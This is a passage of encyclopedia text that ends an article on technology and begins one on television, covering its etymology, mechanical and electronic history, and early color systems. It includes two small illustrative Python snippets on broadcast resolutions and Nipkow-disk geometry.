quantitative and qualitative analysis of past and present technological trends, and attempts to rigorously extrapolate them into the future. Science fiction is often used as a source of ideas. Futures research methodologies include survey research, modeling, statistical analysis, and computer simulations. 
Existential risk Existential risk researchers analyze risks that could lead to human extinction or civilizational collapse, and look for ways to build resilience against them. Relevant research centers include the Cambridge Center for the Study of Existential Risk and the Stanford Existential Risk Initiative. Future technologies may contribute to the risks of artificial general intelligence, biological warfare, nuclear warfare, nanotechnology, anthropogenic climate change, global warming, or stable global totalitarianism, though technologies may also help us mitigate asteroid impacts and gamma-ray bursts. In 2019, philosopher Nick Bostrom introduced the notion of a vulnerable world, "one in which there is some level of technological development at which civilization almost certainly gets devastated by default", citing the risks of a pandemic caused by bioterrorists, or an arms race triggered by the development of novel armaments and the loss of mutual assured destruction. He invites policymakers to question the assumptions that technological progress is always beneficial, that scientific openness is always preferable, or that they can afford to wait until a dangerous technology has been invented before they prepare mitigations. Emerging technologies Emerging technologies are novel technologies whose development or practical applications are still largely unrealized. They include nanotechnology, biotechnology, robotics, 3D printing, and blockchains. In 2005, futurist Ray Kurzweil claimed the next technological revolution would rest upon advances in genetics, nanotechnology, and robotics, with robotics being the most impactful of the three technologies. Genetic engineering will allow far greater control over human biological nature through a process called directed evolution. Some thinkers believe that this may shatter our sense of self, and have urged renewed public debate to explore the issue more thoroughly; others fear that directed evolution could lead to eugenics or extreme social inequality. Nanotechnology will grant us the ability to manipulate matter "at the molecular and atomic scale", which could allow us to reshape ourselves and our environment in fundamental ways. Nanobots could be used within the human body to destroy cancer cells or form new body parts, blurring the line between biology and technology. Autonomous robots have undergone rapid progress, and are expected to replace humans at many dangerous tasks, including search and rescue, bomb disposal, firefighting, and war. Estimates on the advent of artificial general intelligence vary, but half of machine learning experts surveyed in 2018 believe that AI will "accomplish every task better and more cheaply" than humans by 2063, and automate all human jobs by 2140. This expected technological unemployment has led to calls for increased emphasis on computer science education and debates about universal basic income. Political science experts predict that this could lead to a rise in extremism, while others see it as an opportunity to usher in a post-scarcity economy. Movements Appropriate technology Some segments of the 1960s hippie counterculture grew to dislike urban living and developed a preference for locally autonomous, sustainable, and decentralized technology, termed appropriate technology. This later influenced hacker culture and technopaganism. 
Technological utopianism Technological utopianism refers to the belief that technological development is a moral good, which can and should bring about a utopia, that is, a society in which laws, governments, and social conditions serve the needs of all its citizens. Examples of techno-utopian goals include post-scarcity economics, life extension, mind uploading, cryonics, and the creation of artificial superintelligence. Major techno-utopian movements include transhumanism and singularitarianism. The transhumanism movement is founded upon the "continued evolution of human life beyond its current human form" through science and technology, informed by "life-promoting principles and values." The movement gained wider popularity in the early 21st century. Singularitarians believe that machine superintelligence will "accelerate technological progress" by orders of magnitude and "create even more intelligent entities ever faster", which may lead to a pace of societal and technological change that is "incomprehensible" to us. This event horizon is known as the technological singularity. Major figures of techno-utopianism include Ray Kurzweil and Nick Bostrom. Techno-utopianism has attracted both praise and criticism from progressive, religious, and conservative thinkers. Anti-technology backlash Technology's central role in our lives has drawn concerns and backlash. The backlash against technology is not a uniform movement and encompasses many heterogeneous ideologies. The earliest known revolt against technology was Luddism, a pushback against early automation in textile production. Automation had resulted in a need for fewer workers, a process known as technological unemployment. Between the 1970s and 1990s, American terrorist Ted Kaczynski carried out a series of bombings across America and published the Unabomber Manifesto denouncing technology's negative impacts on nature and human freedom. The essay resonated with a large part of the American public. It was partly inspired by Jacques Ellul's The Technological Society. Some subcultures, like the off-the-grid movement, advocate a withdrawal from technology and a return to nature. The ecovillage movement seeks to reestablish harmony between technology and nature. Relation to science and engineering Engineering is the process by which technology is developed. It often requires problem-solving under strict constraints. Technological development is "action-oriented", while scientific knowledge is fundamentally explanatory. Polish philosopher Henryk Skolimowski framed it like so: "science concerns itself with what is, technology with what is to be." The direction of causality between scientific discovery and technological innovation has been debated by scientists, philosophers and policymakers. Because innovation is often undertaken at the edge of scientific knowledge, most technologies are not derived from scientific knowledge, but instead from engineering, tinkering and chance. For example, in the 1940s and 1950s, when knowledge of turbulent combustion or fluid dynamics was still crude, jet engines were invented through "running the device to destruction, analyzing what broke [...] and repeating the process". Scientific explanations often follow technological developments rather than preceding them. Many discoveries also arose from pure chance, like the discovery of penicillin as a result of accidental lab contamination. 
Since the 1960s, the assumption that government funding of basic research would lead to the discovery of marketable technologies has lost credibility. Probabilist Nassim Taleb argues that national research programs that implement the notions of serendipity and convexity through frequent trial and error are more likely to lead to useful innovations than research that aims to reach specific outcomes. Despite this, modern technology is increasingly reliant on deep, domain-specific scientific knowledge. In 1975, there was an average of one citation of scientific literature in every three patents granted in the U.S.; by 1989, this increased to an average of one citation per patent. The average was skewed upwards by patents related to the pharmaceutical industry, chemistry, and electronics. A 2021 analysis shows that patents that are based on scientific discoveries are on average 26% more valuable than equivalent non-science-based patents. Other animal species The use of basic technology is also a feature of non-human animal species. Tool use was once considered a defining characteristic of the genus Homo. This view was supplanted after the discovery of evidence of tool use among chimpanzees and other primates, dolphins, and crows. For example, researchers have observed wild chimpanzees using basic foraging tools such as pestles and levers, using leaves as sponges, and using tree bark or vines as probes to fish for termites. West African chimpanzees use stone hammers and anvils for cracking nuts, as do capuchin monkeys of Boa Vista, Brazil. Tool use is not the only form of animal technology use; for example, beaver dams, built with wooden sticks or large stones, are a technology with "dramatic" impacts on river habitats and ecosystems. Popular culture The relationship of humanity with technology has been explored in science-fiction literature, for example in Brave New World, A Clockwork Orange, Nineteen Eighty-Four, Isaac Asimov's essays, and movies like Minority Report, Total Recall, Gattaca, and Inception. It has spawned the dystopian and futuristic cyberpunk genre, which juxtaposes futuristic technology with societal collapse, dystopia or decay. Notable cyberpunk works include William Gibson's novel Neuromancer and movies like Blade Runner and The Matrix.
Technology
null
null
29831
https://en.wikipedia.org/wiki/Television
Television
Television (TV) is a telecommunication medium for transmitting moving images and sound. Additionally, the term can refer to a physical television set rather than the medium of transmission. Television is a mass medium for advertising, entertainment, news, and sports. The medium is capable of more than radio broadcasting, which transmits only an audio signal to radio receivers. Television became available in crude experimental forms in the 1920s, but only after several years of further development was the new technology marketed to consumers. After World War II, an improved form of black-and-white television broadcasting became popular in the United Kingdom and the United States, and television sets became commonplace in homes, businesses, and institutions. During the 1950s, television was the primary medium for influencing public opinion. In the mid-1960s, color broadcasting was introduced in the U.S. and most other developed countries. The availability of various types of archival storage media such as Betamax and VHS tapes, LaserDiscs, high-capacity hard disk drives, CDs, DVDs, flash drives, high-definition HD DVDs and Blu-ray Discs, and cloud digital video recorders has enabled viewers to watch pre-recorded material—such as movies—at home on their own time schedule. For many reasons, especially the convenience of remote retrieval, the storage of television and video programming now also occurs on the cloud (such as the video-on-demand service by Netflix). At the beginning of the 2010s, digital television transmissions greatly increased in popularity. Another development was the move from standard-definition television (SDTV) (576i, with 576 interlaced lines of resolution, and 480i) to high-definition television (HDTV), which provides a resolution that is substantially higher. HDTV may be transmitted in different formats: 1080p, 1080i and 720p. Since 2010, with the invention of smart television, Internet television has increased the availability of television programs and movies via the Internet through streaming video services such as Netflix, Amazon Prime Video, iPlayer and Hulu. In 2013, 79% of the world's households owned a television set. The replacement of earlier cathode-ray tube (CRT) screen displays with compact, energy-efficient, flat-panel alternative technologies such as LCDs (both fluorescent-backlit and LED), OLED displays, and plasma displays was a hardware revolution that began with computer monitors in the late 1990s. Most television sets sold in the 2000s were still CRT; it was only in the early 2010s that flat-screen TVs decisively overtook CRT. Major manufacturers announced the discontinuation of CRT, Digital Light Processing (DLP), plasma, and even fluorescent-backlit LCDs by the mid-2010s. LEDs are gradually being replaced by OLEDs. Major manufacturers also began increasingly producing smart TVs in the mid-2010s. Smart TVs with integrated Internet and Web 2.0 functions became the dominant form of television by the late 2010s. Television signals were initially distributed only as terrestrial television using high-powered radio-frequency television transmitters to broadcast the signal to individual television receivers. Alternatively, television signals are distributed by coaxial cable or optical fiber, satellite systems, and, since the 2000s, via the Internet. Until the early 2000s, these were transmitted as analog signals, but a transition to digital television was expected to be completed worldwide by the late 2010s. 
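As a rough quantitative illustration of the jump from SDTV to HDTV mentioned above, the sketch below computes pixels per frame and an approximate uncompressed bit rate for some common formats. The frame sizes, frame rates, and the 16-bit-per-pixel figure (typical of 4:2:2 chroma subsampling, counting active picture only) are illustrative assumptions, not values taken from this article.

```python
# Illustrative comparison of broadcast formats (assumed sizes and rates;
# 16 bits/pixel approximates 4:2:2 sampling, active picture only).
formats = {
    "480i SDTV": (720, 480, 30),
    "576i SDTV": (720, 576, 25),
    "720p HDTV": (1280, 720, 60),
    "1080p HDTV": (1920, 1080, 30),
}

BITS_PER_PIXEL = 16

for name, (width, height, fps) in formats.items():
    pixels = width * height
    raw_mbps = pixels * fps * BITS_PER_PIXEL / 1e6  # raw Mbit/s, no compression
    print(f"{name:11} {width}x{height}: {pixels:9,} px/frame, ~{raw_mbps:5.0f} Mbit/s raw")
```

These back-of-the-envelope figures (roughly 170 Mbit/s for SDTV and up to about 1 Gbit/s for HDTV, before compression) are consistent with the uncompressed rates cited later in this article, and show why digital broadcasting had to wait for practical video compression.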
A standard television set consists of multiple internal electronic circuits, including a tuner for receiving and decoding broadcast signals. A visual display device that lacks a tuner is correctly called a video monitor rather than a television. Television broadcasts are mainly simplex, meaning that the transmitter cannot receive and the receiver cannot transmit. Etymology The word television comes from Ancient Greek τῆλε (tēle) 'far' and Latin visio 'sight'. The first documented usage of the term dates back to 1900, when the Russian scientist Constantin Perskyi used it in a paper that he presented in French at the first International Congress of Electricity, which ran from 18 to 25 August 1900 during the International World Fair in Paris. The anglicized version of the term is first attested in 1907, when it was still "...a theoretical system to transmit moving images over telegraph or telephone wires". It was "...formed in English or borrowed from French télévision." In the 19th century and early 20th century, other "...proposals for the name of a then-hypothetical technology for sending pictures over distance were telephote (1880) and televista (1904)." The abbreviation TV is from 1948. The use of the term to mean "a television set" dates from 1941. The use of the term to mean "television as a medium" dates from 1927. The term telly is more common in the UK. The slang term "the tube" or the "boob tube" derives from the bulky cathode-ray tube used on most TVs until the advent of flat-screen TVs. Another slang term for the TV is "idiot box." History Mechanical Facsimile transmission systems for still photographs pioneered methods of mechanical scanning of images in the early 19th century. Alexander Bain introduced the facsimile machine between 1843 and 1846. Frederick Bakewell demonstrated a working laboratory version in 1851. Willoughby Smith discovered the photoconductivity of the element selenium in 1873. As a 23-year-old German university student, Paul Julius Gottlieb Nipkow proposed and patented the Nipkow disk in 1884 in Berlin. This was a spinning disk with a spiral pattern of holes, so each hole scanned a line of the image. Although he never built a working model of the system, variations of Nipkow's spinning-disk "image rasterizer" became exceedingly common. Constantin Perskyi had coined the word television in a paper read to the International Electricity Congress at the International World Fair in Paris on 24 August 1900. Perskyi's paper reviewed the existing electromechanical technologies, mentioning the work of Nipkow and others. However, it was not until 1907 that developments in amplification tube technology by Lee de Forest and Arthur Korn, among others, made the design practical. The first demonstration of the live transmission of images was by Georges Rignoux and A. Fournier in Paris in 1909. A matrix of 64 selenium cells, individually wired to a mechanical commutator, served as an electronic retina. In the receiver, a type of Kerr cell modulated the light, and a series of differently angled mirrors attached to the edge of a rotating disc scanned the modulated beam onto the display screen. A separate circuit regulated synchronization. The 8x8 pixel resolution in this proof-of-concept demonstration was just sufficient to clearly transmit individual letters of the alphabet. An updated image was transmitted "several times" each second. 
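To make the Nipkow disk's scanning geometry described above concrete, here is a minimal sketch with illustrative values rather than the dimensions of any historical apparatus: the holes are spaced evenly around the disk but each sits slightly closer to the center, so one revolution sweeps the holes one after another across the viewing aperture, each tracing the next scan line.

```python
# Minimal sketch of Nipkow-disk scanning geometry (illustrative values;
# Baird's disks used 30 holes, giving 30 scan lines per revolution).
N_HOLES = 30          # one hole per scan line
OUTER_RADIUS = 100.0  # arbitrary units
LINE_PITCH = 1.0      # radial step between holes = scan-line spacing

for hole in range(N_HOLES):
    # Holes are evenly spaced in angle but spiral inward in radius,
    # so each one crosses the image aperture on its own scan line.
    angle_deg = 360.0 * hole / N_HOLES
    radius = OUTER_RADIUS - hole * LINE_PITCH
    print(f"hole {hole:2d}: {angle_deg:6.1f} deg, radius {radius:5.1f}")
```

One full revolution thus rasterizes a complete frame, so the disk's rotation rate sets the frame rate: a disk spun at 12.5 revolutions per second, for example, delivers 12.5 frames per second, the order of magnitude of early mechanical systems.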
In 1911, Boris Rosing and his student Vladimir Zworykin created a system that used a mechanical mirror-drum scanner to transmit, in Zworykin's words, "very crude images" over wires to the "Braun tube" (cathode-ray tube or "CRT") in the receiver. Moving images were not possible because, in the scanner: "the sensitivity was not enough and the selenium cell was very laggy". In 1921, Édouard Belin sent the first image via radio waves with his belinograph. By the 1920s, when amplification made television practical, Scottish inventor John Logie Baird employed the Nipkow disk in his prototype video systems. On 25 March 1925, Baird gave the first public demonstration of televised silhouette images in motion at Selfridges department store in London. Since human faces had inadequate contrast to show up on his primitive system, he televised a ventriloquist's dummy named "Stooky Bill," whose painted face had higher contrast, talking and moving. By 26 January 1926, he had demonstrated before members of the Royal Institution the transmission of an image of a face in motion by radio. This is widely regarded as the world's first true public television demonstration, exhibiting light, shade, and detail. Baird's system used the Nipkow disk for both scanning the image and displaying it. A brightly illuminated subject was placed in front of a spinning Nipkow disk set with lenses that swept images across a static photocell. The thallium sulfide (Thalofide) cell, developed by Theodore Case in the U.S., detected the light reflected from the subject and converted it into a proportional electrical signal. This was transmitted by AM radio waves to a receiver unit, where the video signal was applied to a neon light behind a second Nipkow disk rotating in synchronization with the first. The brightness of the neon lamp was varied in proportion to the brightness of each spot on the image. As each hole in the disk passed by, one scan line of the image was reproduced. Baird's disk had 30 holes, producing an image with only 30 scan lines, just enough to recognize a human face. In 1927, Baird transmitted a signal over 438 miles (705 km) of telephone line between London and Glasgow. Baird's original 'televisor' now resides in the Science Museum, South Kensington. In 1928, Baird's company (Baird Television Development Company/Cinema Television) broadcast the first transatlantic television signal between London and New York and the first shore-to-ship transmission. In 1929, he became involved in the first experimental mechanical television service in Germany. In November of the same year, Baird and Bernard Natan of Pathé established France's first television company, Télévision-Baird-Natan. In 1931, he made the first outdoor remote broadcast of The Derby. In 1932, he demonstrated ultra-short wave television. Baird's mechanical system reached a peak of 240 lines of resolution on BBC telecasts in 1936, though the mechanical system did not scan the televised scene directly. Instead, a 17.5 mm film was shot, rapidly developed, and then scanned while the film was still wet. A U.S. inventor, Charles Francis Jenkins, also pioneered television. He published an article on "Motion Pictures by Wireless" in 1913, transmitted moving silhouette images for witnesses in December 1923, and on 13 June 1925, publicly demonstrated synchronized transmission of silhouette pictures. 
In 1925, Jenkins used the Nipkow disk and transmitted the silhouette image of a toy windmill in motion over a distance of 5 miles (8 km), from a naval radio station in Maryland to his laboratory in Washington, D.C., using a lensed disk scanner with a 48-line resolution. He was granted U.S. Patent No. 1,544,156 (Transmitting Pictures over Wireless) on 30 June 1925 (filed 13 March 1922). Herbert E. Ives and Frank Gray of Bell Telephone Laboratories gave a dramatic demonstration of mechanical television on 7 April 1927. Their reflected-light television system included both small and large viewing screens. The small receiver had a 2-inch-wide by 2.5-inch-high screen (5 by 6 cm). The large receiver had a screen 24 inches wide by 30 inches high (60 by 75 cm). Both sets could reproduce reasonably accurate, monochromatic, moving images. Along with the pictures, the sets received synchronized sound. The system transmitted images over two paths: first, a copper wire link from Washington to New York City, then a radio link from Whippany, New Jersey. Comparing the two transmission methods, viewers noted no difference in quality. Subjects of the telecast included Secretary of Commerce Herbert Hoover. A flying-spot scanner beam illuminated these subjects. The scanner that produced the beam had a 50-aperture disk. The disc revolved at a rate of 18 frames per second, capturing one frame about every 56 milliseconds. (Today's systems typically transmit 30 or 60 frames per second, or one frame every 33.3 or 16.7 milliseconds, respectively.) Television historian Albert Abramson underscored the significance of the Bell Labs demonstration: "It was, in fact, the best demonstration of a mechanical television system ever made to this time. It would be several years before any other system could even begin to compare with it in picture quality." In 1928, WRGB, then W2XB, was started as the world's first television station. It broadcast from the General Electric facility in Schenectady, NY. It was popularly known as "WGY Television." Meanwhile, in the Soviet Union, Leon Theremin had been developing a mirror drum-based television, starting with 16 lines resolution in 1925, then 32 lines, and eventually 64 using interlacing in 1926. As part of his thesis, on 7 May 1926, he electrically transmitted and then projected near-simultaneous moving images on a screen. By 1927 Theremin had achieved an image of 100 lines, a resolution that was not surpassed until May 1932 by RCA, with 120 lines. On 25 December 1926, Kenjiro Takayanagi demonstrated a television system with a 40-line resolution that employed a Nipkow disk scanner and CRT display at Hamamatsu Industrial High School in Japan. This prototype is still on display at the Takayanagi Memorial Museum in Shizuoka University, Hamamatsu Campus. His research in creating a production model was halted by the SCAP after World War II. Because only a limited number of holes could be made in the disks, and disks beyond a certain diameter became impractical, image resolution on mechanical television broadcasts was relatively low, ranging from about 30 lines up to 120 or so. Nevertheless, the image quality of 30-line transmissions steadily improved with technical advances, and by 1933 the UK broadcasts using the Baird system were remarkably clear. A few systems ranging into the 200-line region also went on the air. Two of these were the 180-line system that Compagnie des Compteurs (CDC) installed in Paris in 1935 and the 180-line system that Peck Television Corp. 
started in 1935 at station VE9AK in Montreal. The advancement of all-electronic television (including image dissectors and other camera tubes and cathode-ray tubes for the reproducer) marked the beginning of the end for mechanical systems as the dominant form of television. Mechanical television, despite its inferior image quality and generally smaller picture, would remain the primary television technology until the 1930s. The last mechanical telecasts ended in 1939 at stations run by a handful of public universities in the United States. Electronic In 1897, English physicist J. J. Thomson was able, in his three well-known experiments, to deflect cathode rays, a fundamental function of the modern cathode-ray tube (CRT). The earliest version of the CRT was invented by the German physicist Ferdinand Braun in 1897 and is also known as the "Braun" tube. It was a cold-cathode diode, a modification of the Crookes tube, with a phosphor-coated screen. Braun was the first to conceive the use of a CRT as a display device. The Braun tube became the foundation of 20th century television. In 1906, the Germans Max Dieckmann and Gustav Glage produced raster images for the first time in a CRT. In 1907, Russian scientist Boris Rosing used a CRT in the receiving end of an experimental video signal to form a picture. He managed to display simple geometric shapes onto the screen. In 1908, Alan Archibald Campbell-Swinton, a fellow of the Royal Society (UK), published a letter in the scientific journal Nature in which he described how "distant electric vision" could be achieved by using a cathode-ray tube, or Braun tube, as both a transmitting and receiving device. He expanded on his vision in a speech given in London in 1911 and reported in The Times and the Journal of the Röntgen Society. In a letter to Nature published in October 1926, Campbell-Swinton also announced the results of some "not very successful experiments" he had conducted with G. M. Minchin and J. C. M. Stanton. They had attempted to generate an electrical signal by projecting an image onto a selenium-coated metal plate that was simultaneously scanned by a cathode ray beam. These experiments were conducted before March 1914, when Minchin died, but they were later repeated by two different teams in 1937, by H. Miller and J. W. Strange from EMI, and by H. Iams and A. Rose from RCA. Both teams successfully transmitted "very faint" images with Campbell-Swinton's original selenium-coated plate. Although others had experimented with using a cathode-ray tube as a receiver, the concept of using one as a transmitter was novel. The first cathode-ray tube to use a hot cathode was developed by John B. Johnson (who gave his name to the term Johnson noise) and Harry Weiner Weinhart of Western Electric, and became a commercial product in 1922. In 1926, Hungarian engineer Kálmán Tihanyi designed a television system using fully electronic scanning and display elements and employing the principle of "charge storage" within the scanning (or "camera") tube. The problem of low sensitivity to light resulting in low electrical output from transmitting or "camera" tubes would be solved with the introduction of charge-storage technology by Kálmán Tihanyi beginning in 1924. His solution was a camera tube that accumulated and stored electrical charges ("photoelectrons") within the tube throughout each scanning cycle. The device was first described in a patent application he filed in Hungary in March 1926 for a television system he called "Radioskop". 
After further refinements included in a 1928 patent application, Tihanyi's patent was declared void in Great Britain in 1930, so he applied for patents in the United States. Although his breakthrough would be incorporated into the design of RCA's "iconoscope" in 1931, the U.S. patent for Tihanyi's transmitting tube would not be granted until May 1939. The patent for his receiving tube had been granted the previous October. Both patents had been purchased by RCA prior to their approval. Charge storage remains a basic principle in the design of imaging devices for television to the present day. On 25 December 1926, at Hamamatsu Industrial High School in Japan, Japanese inventor Kenjiro Takayanagi demonstrated a TV system with a 40-line resolution that employed a CRT display. This was the first working example of a fully electronic television receiver and Takayanagi's team later made improvements to this system parallel to other television developments. Takayanagi did not apply for a patent. In the 1930s, Allen B. DuMont made the first CRTs to last 1,000 hours of use, one of the factors that led to the widespread adoption of television. On 7 September 1927, U.S. inventor Philo Farnsworth's image dissector camera tube transmitted its first image, a simple straight line, at his laboratory at 202 Green Street in San Francisco. By 3 September 1928, Farnsworth had developed the system sufficiently to hold a demonstration for the press. This is widely regarded as the first electronic television demonstration. In 1929, the system was improved further by eliminating a motor generator so that his television system had no mechanical parts. That year, Farnsworth transmitted the first live human images with his system, including a three and a half-inch image of his wife Elma ("Pem") with her eyes closed (possibly due to the bright lighting required). Meanwhile, Vladimir Zworykin also experimented with the cathode-ray tube to create and show images. While working for Westinghouse Electric in 1923, he began to develop an electronic camera tube. However, in a 1925 demonstration, the image was dim, had low contrast and poor definition, and was stationary. Zworykin's imaging tube never got beyond the laboratory stage. However, RCA, which acquired the Westinghouse patent, asserted that the patent for Farnsworth's 1927 image dissector was written so broadly that it would exclude any other electronic imaging device. Thus, based on Zworykin's 1923 patent application, RCA filed a patent interference suit against Farnsworth. The U.S. Patent Office examiner disagreed in a 1935 decision, finding priority of invention for Farnsworth against Zworykin. Farnsworth claimed that Zworykin's 1923 system could not produce an electrical image of the type to challenge his patent. Zworykin received a patent in 1928 for a color transmission version of his 1923 patent application. He also divided his original application in 1931. Zworykin was unable or unwilling to introduce evidence of a working model of his tube that was based on his 1923 patent application. In September 1939, after losing an appeal in the courts and being determined to go forward with the commercial manufacturing of television equipment, RCA agreed to pay Farnsworth US$1 million over ten years, in addition to license payments, to use his patents. In 1933, RCA introduced an improved camera tube that relied on Tihanyi's charge storage principle. 
Called the "Iconoscope" by Zworykin, the new tube had a light sensitivity of about 75,000 lux, and thus was claimed to be much more sensitive than Farnsworth's image dissector. However, Farnsworth had overcome his power issues with his Image Dissector through the invention of a completely unique "Multipactor" device that he began work on in 1930, and demonstrated in 1931. This small tube could amplify a signal reportedly to the 60th power or better and showed great promise in all fields of electronics. Unfortunately, an issue with the multipactor was that it wore out at an unsatisfactory rate. At the Berlin Radio Show in August 1931 in Berlin, Manfred von Ardenne gave a public demonstration of a television system using a CRT for both transmission and reception, the first completely electronic television transmission. However, Ardenne had not developed a camera tube, using the CRT instead as a flying-spot scanner to scan slides and film. Ardenne achieved his first transmission of television pictures on 24 December 1933, followed by test runs for a public television service in 1934. The world's first electronically scanned television service then started in Berlin in 1935, the Fernsehsender Paul Nipkow, culminating in the live broadcast of the 1936 Summer Olympic Games from Berlin to public places all over Germany. Philo Farnsworth gave the world's first public demonstration of an all-electronic television system, using a live camera, at the Franklin Institute of Philadelphia on 25 August 1934 and for ten days afterward. Mexican inventor Guillermo González Camarena also played an important role in early television. His experiments with television (known as telectroescopía at first) began in 1931 and led to a patent for the "trichromatic field sequential system" color television in 1940. In Britain, the EMI engineering team led by Isaac Shoenberg applied in 1932 for a patent for a new device they called "the Emitron", which formed the heart of the cameras they designed for the BBC. On 2 November 1936, a 405-line broadcasting service employing the Emitron began at studios in Alexandra Palace and transmitted from a specially built mast atop one of the Victorian building's towers. It alternated briefly with Baird's mechanical system in adjoining studios but was more reliable and visibly superior. This was the world's first regular "high-definition" television service. The original U.S. iconoscope was noisy, had a high ratio of interference to signal, and ultimately gave disappointing results, especially compared to the high-definition mechanical scanning systems that became available. The EMI team, under the supervision of Isaac Shoenberg, analyzed how the iconoscope (or Emitron) produced an electronic signal and concluded that its real efficiency was only about 5% of the theoretical maximum. They solved this problem by developing and patenting in 1934 two new camera tubes dubbed super-Emitron and CPS Emitron. The super-Emitron was between ten and fifteen times more sensitive than the original Emitron and iconoscope tubes, and, in some cases, this ratio was considerably greater. It was used for outside broadcasting by the BBC, for the first time, on Armistice Day 1937, when the general public could watch on a television set as the King laid a wreath at the Cenotaph. This was the first time that anyone had broadcast a live street scene from cameras installed on the roof of neighboring buildings because neither Farnsworth nor RCA would do the same until the 1939 New York World's Fair. 
On the other hand, in 1934, Zworykin shared some patent rights with the German licensee company Telefunken. The "image iconoscope" ("Superikonoskop" in Germany) was produced as a result of the collaboration. This tube is essentially identical to the super-Emitron. The production and commercialization of the super-Emitron and image iconoscope in Europe were not affected by the patent war between Zworykin and Farnsworth because Dieckmann and Hell had priority in Germany for the invention of the image dissector, having submitted a patent application for their Lichtelektrische Bildzerlegerröhre für Fernseher (Photoelectric Image Dissector Tube for Television) in Germany in 1925, two years before Farnsworth did the same in the United States. The image iconoscope (Superikonoskop) became the industrial standard for public broadcasting in Europe from 1936 until 1960, when it was replaced by the vidicon and plumbicon tubes. Indeed, it represented the European tradition in electronic tubes competing against the American tradition represented by the image orthicon. The German company Heimann produced the Superikonoskop for the 1936 Berlin Olympic Games; later, Heimann also produced and commercialized it from 1940 to 1955; finally, the Dutch company Philips produced and commercialized the image iconoscope and multicon from 1952 to 1958. U.S. television broadcasting, at the time, consisted of a variety of markets in a wide range of sizes, each competing for programming and dominance with separate technology until deals were made and standards agreed upon in 1941. RCA, for example, used only Iconoscopes in the New York area, but Farnsworth Image Dissectors in Philadelphia and San Francisco. In September 1939, RCA agreed to pay the Farnsworth Television and Radio Corporation royalties over the next ten years for access to Farnsworth's patents. With this historic agreement in place, RCA integrated much of what was best about the Farnsworth Technology into their systems. In 1941, the United States implemented 525-line television. Electrical engineer Benjamin Adler played a prominent role in the development of television. The world's first 625-line television standard was designed in the Soviet Union in 1944 and became a national standard in 1946. The first broadcast in 625-line standard occurred in Moscow in 1948. The concept of 625 lines per frame was subsequently implemented in the European CCIR standard. In 1936, Kálmán Tihanyi described the principle of plasma display, the first flat-panel display system. Early electronic television sets were large and bulky, with analog circuits made of vacuum tubes. Following the invention of the first working transistor at Bell Labs, Sony founder Masaru Ibuka predicted in 1952 that the transition to electronic circuits made of transistors would lead to smaller and more portable television sets. The first fully transistorized, portable solid-state television set was the 8-inch Sony TV8-301, developed in 1959 and released in 1960. This began the transformation of television viewership from a communal viewing experience to a solitary viewing experience. By 1960, Sony had sold over 4 million portable television sets worldwide. Color The basic idea of using three monochrome images to produce a color image had been experimented with almost as soon as black-and-white televisions had first been built. 
Although he gave no practical details, among the earliest published proposals for television was one by Maurice Le Blanc in 1880 for a color system, including the first mentions in television literature of line and frame scanning. Polish inventor Jan Szczepanik patented a color television system in 1897, using a selenium photoelectric cell at the transmitter and an electromagnet controlling an oscillating mirror and a moving prism at the receiver. But his system contained no means of analyzing the spectrum of colors at the transmitting end and could not have worked as he described it. Another inventor, Hovannes Adamian, also experimented with color television as early as 1907. He is credited with the first color television project, patented in Germany on 31 March 1908 (patent No. 197183), then in Britain on 1 April 1908 (patent No. 7219), in France (patent No. 390326), and in Russia in 1910 (patent No. 17912). Scottish inventor John Logie Baird demonstrated the world's first color transmission on 3 July 1928, using scanning discs at the transmitting and receiving ends with three spirals of apertures, each spiral with filters of a different primary color, and three light sources at the receiving end, with a commutator to alternate their illumination. Baird also made the world's first color broadcast on 4 February 1938, sending a mechanically scanned 120-line image from Baird's Crystal Palace studios to a projection screen at London's Dominion Theatre. Mechanically scanned color television was also demonstrated by Bell Laboratories in June 1929 using three complete systems of photoelectric cells, amplifiers, glow-tubes, and color filters, with a series of mirrors to superimpose the red, green, and blue images into one full-color image. The first practical hybrid system was again pioneered by John Logie Baird. In 1940 he publicly demonstrated a color television combining a traditional black-and-white display with a rotating colored disk. This device was very "deep" but was later improved with a mirror folding the light path into an entirely practical device resembling a large conventional console. However, Baird was unhappy with the design, and, as early as 1944, had commented to a British government committee that a fully electronic device would be better. In 1939, Hungarian engineer Peter Carl Goldmark, while at CBS, introduced an electro-mechanical system that contained an Iconoscope sensor. The CBS field-sequential color system was partly mechanical, with a disc made of red, blue, and green filters spinning inside the television camera at 1,200 rpm and a similar disc spinning in synchronization in front of the cathode-ray tube inside the receiver set. The system was first demonstrated to the Federal Communications Commission (FCC) on 29 August 1940 and shown to the press on 4 September. CBS began experimental color field tests using film as early as 28 August 1940 and live cameras by 12 November. NBC (owned by RCA) made its first field test of color television on 20 February 1941. CBS began daily color field tests on 1 June 1941. These color systems were not compatible with existing black-and-white television sets, and, as no color television sets were available to the public at this time, viewing of the color field tests was restricted to RCA and CBS engineers and the invited press. 
The War Production Board halted the manufacture of television and radio equipment for civilian use from 22 April 1942 to 20 August 1945, limiting any opportunity to introduce color television to the general public. As early as 1940, Baird had started work on a fully electronic system he called Telechrome. Early Telechrome devices used two electron guns aimed at either side of a phosphor plate. The phosphor was patterned so the electrons from the guns only fell on one side of the patterning or the other. Using cyan and magenta phosphors, a reasonable limited-color image could be obtained. He also demonstrated the same system using monochrome signals to produce a 3D image (called "stereoscopic" at the time). A demonstration on 16 August 1944 was the first example of a practical color television system. Work on the Telechrome continued, and plans were made to introduce a three-gun version for full color. However, Baird's untimely death in 1946 ended the development of the Telechrome system. Similar concepts were common through the 1940s and 1950s, differing primarily in the way they re-combined the colors generated by the three guns. The Geer tube was similar to Baird's concept but used small pyramids with the phosphors deposited on their outside faces instead of Baird's 3D patterning on a flat surface. The Penetron used three layers of phosphor on top of each other and increased the power of the beam to reach the upper layers when drawing those colors. The Chromatron used a set of focusing wires to select the colored phosphors arranged in vertical stripes on the tube. One of the great technical challenges of introducing color broadcast television was the desire to conserve bandwidth, potentially three times that of the existing black-and-white standards, and not use an excessive amount of radio spectrum. In the United States, after considerable research, the National Television Systems Committee approved an all-electronic system developed by RCA, which encoded the color information separately from the brightness information and significantly reduced the resolution of the color information to conserve bandwidth. As black-and-white televisions could receive the same transmission and display it in black-and-white, the color system adopted is [backwards] "compatible." ("Compatible Color," featured in RCA advertisements of the period, is mentioned in the song "America," of West Side Story, 1957.) The brightness image remained compatible with existing black-and-white television sets at slightly reduced resolution. In contrast, color televisions could decode the extra information in the signal and produce a limited-resolution color display. The higher-resolution black-and-white and lower-resolution color images combine in the brain to produce a seemingly high-resolution color image. The NTSC standard represented a significant technical achievement. The first color broadcast (the first episode of the live program The Marriage) occurred on 8 July 1954. However, during the following ten years, 